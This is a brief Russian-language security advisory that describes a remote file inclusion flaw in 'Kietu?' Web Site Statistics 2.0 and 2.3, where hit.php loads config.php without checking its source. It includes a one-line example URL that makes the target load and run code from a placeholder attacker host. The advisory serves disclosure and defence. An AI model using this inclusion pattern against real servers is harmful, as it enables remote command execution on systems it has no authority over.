Уязвимость подключения файла обнаружена в программе ‘Kietu?’ Web Site Statistics. Удаленный пользователь может выполнять произвольные команды на операционной системе. 

Файл hit.php подключает файл config.php, не подтверждая правильности включенного файла. В результате удаленный атакующий может сконструировать URL, который ссылается на другой файл
config.php, расположенный на удаленном сервере. Этот файл будет включен и выполнен целевым сервером. Пример: 

http://[target]/hit.php?url_hit=http://[attacker]/

Уязвимость обнаружена в ‘Kietu?’ Web Site Statistics 2.0, 2.3.



Оставить мнение